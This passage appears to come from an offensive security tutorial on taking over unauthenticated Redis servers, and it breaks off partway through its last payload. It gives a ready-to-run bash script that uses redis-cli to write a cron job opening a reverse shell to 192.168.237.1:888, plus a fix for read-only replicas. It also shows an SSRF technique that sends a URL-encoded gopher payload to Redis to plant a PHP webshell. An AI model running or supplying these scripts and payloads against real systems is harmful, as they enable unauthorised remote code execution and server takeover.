Taking the Linux case, writing a scheduled task (cron job), as the example. This relies on Redis running as root, since SAVE must be able to write the dump file into /var/spool/cron/. Write exp.sh:
#!/bin/bash
# usage: ./exp.sh <redis_ip> <redis_port>   (reverse shell goes to 192.168.237.1:888)
redis-cli -h "$1" -p "$2" config set dir /var/spool/cron/
redis-cli -h "$1" -p "$2" config set dbfilename root
# $'...' turns the \n sequences into real newlines, so the crontab entry sits on its own line inside the RDB file
redis-cli -h "$1" -p "$2" set 1 $'\n\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.237.1/888 0>&1\n\n\n'
redis-cli -h "$1" -p "$2" save
Run:
chmod +x exp.sh
./exp.sh redis_ip redis_port
The saved file is an RDB dump, so binary header bytes surround the crontab entry. cronie on CentOS/RHEL tolerates that; Debian/Ubuntu cron keeps its crontabs under /var/spool/cron/crontabs/ and is stricter about the file's mode and contents, so the same payload usually fails there.
If you get the error "(error) READONLY You can't write against a read only slave.", the target is a read-only replica; fix it with config set slave-read-only no (on Redis 5 and later the same option is also named replica-read-only). This only helps while CONFIG SET itself is still reachable, i.e. not renamed or disabled.
When an SSRF lets you reach a Redis service on the internal network, you can take it over by using the gopher protocol to write a raw TCP stream to it. Here is a tool that generates the payload in one step: https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher. Usage is as follows:
The redis.cmd file holds the Redis commands to execute, one command per line, e.g.
flushall
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save
The resulting payload:
%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a
Just prefix the payload with gopher://ip:port/_ for the machine you want to attack and send it with curl. The underscore is the gopher item-type character: the first character after the slash is consumed by the gopher client and not sent, so everything after it reaches Redis as the raw RESP stream. Final payload:
gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%